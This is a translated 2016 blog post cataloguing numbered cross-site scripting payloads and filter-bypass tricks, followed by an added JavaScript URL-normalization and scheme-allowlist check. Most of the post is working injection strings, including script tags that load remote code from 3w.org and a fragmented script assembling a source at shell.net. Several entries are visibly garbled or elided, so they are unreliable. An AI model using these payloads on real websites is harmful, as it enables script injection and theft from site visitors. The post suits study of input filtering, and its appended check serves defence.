XSS Attack Roundup

Posted 2016-4-28 10:06:15
(1) Plain XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative ways to pop an alert

<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)

<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator); the payload is elided in the post

<IMG SRC=jav..省略..S')>

(9) 7-digit UTF-8 Unicode encoding, no semicolons (calculator); the payload is elided in the post

<IMG SRC=jav..省略..S')>

(10) Hex encoding, also without semicolons (calculator)

<IMG SRC=\'#\'" /span>

(11) Embedded tab splitting up the JavaScript

<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab splitting up the JavaScript

<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection, an extreme XSS example

<IMG SRC=\'#\'" /span>

(16) Working around character-count limits (must be on the same page)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective in China, since there is nowhere to make use of them

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag

<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3

<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC=\'#\'" /span>

(27) Double open angle brackets

<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escape filtering

\";alert('XSS');//

(30) Closing the TITLE tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image

<INPUT SRC=\'#\'" /span>

(32) BODY Image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY('XSS')>

(34) IMG Dynsrc

<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc

<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND

<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript

<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with a link URL

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe

<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame

<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32, 34, 39, 160, 8192-8, 13, 12288, 65279)

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression

<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression

<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (an open angle bracket followed by a letter)

<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE approach

expression(alert("XSS"))'>

(53) STYLE background

<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS

<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
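Added defensive example, not part of the original post: the case, entity, control-character and whitespace variants in items (3) to (15), (17), (19) and (47) all get past a filter that compares the raw attribute value against the literal string javascript:. The check below normalizes a URL-valued attribute the way a browser does before it parses the scheme (numeric entity decoding, removal of ignored code points, case folding) and then applies a scheme allowlist instead of a denylist. The function names and the sample inputs are constructed for this example.

```javascript
// Added example: normalize a URL attribute value before checking its scheme.
// Function names and sample inputs are constructed here, not taken from the post.

const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// Decode numeric character references (&#106; &#x6A; and the semicolon-less forms of
// items (5), (9) and (10)) in one pass, so "&#x26;#106;" is not double-decoded.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (_, num) => {
    const cp = /^x/i.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return cp > 0x10ffff ? "\ufffd" : String.fromCodePoint(cp);
  });
}

// Drop the code points browsers ignore in a URL before scheme parsing: C0 controls and
// space (the tab, newline, CR and NUL of items (11) to (17)), DEL, and the extra
// whitespace-like code points item (47) lists (U+00A0, U+2000-U+200A, U+3000, U+FEFF).
function normalizeUrl(value) {
  return decodeNumericEntities(value)
    .replace(/[\u0000-\u0020\u007f\u00a0\u2000-\u200a\u3000\ufeff]/g, "")
    .toLowerCase();
}

// Allowlist check: safe only if the normalized value has no scheme (a relative URL)
// or an allowed one. A denylist on "javascript:" is exactly what the variants bypass.
function isSafeUrl(value) {
  const m = /^([a-z][a-z0-9+.\-]*):/.exec(normalizeUrl(value));
  return m === null || ALLOWED_SCHEMES.has(m[1]);
}

// Constructed samples modelled on the items above, paired with the expected verdict.
const SAMPLES = [
  ["https://example.com/a.png", true],
  ["/static/logo.png", true],
  ["JaVaScRiPt:alert('XSS')", false],                                  // item (4)
  ["&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61lert('XSS')", false], // (10)
  ["jav\tascript:alert('XSS')", false],                                // item (11)
  ["java\0script:alert('XSS')", false],                                // item (17)
];

// Returns one boolean per sample: true when isSafeUrl agrees with the expected verdict.
function checkAll(samples = SAMPLES) {
  return samples.map(([value, expected]) => isSafeUrl(value) === expected);
}
```

This check covers only URL-valued attributes; the event-handler, unknown-tag and CSS expression entries (items (21), (48), (50), (99)) need element and attribute allowlisting on top of it.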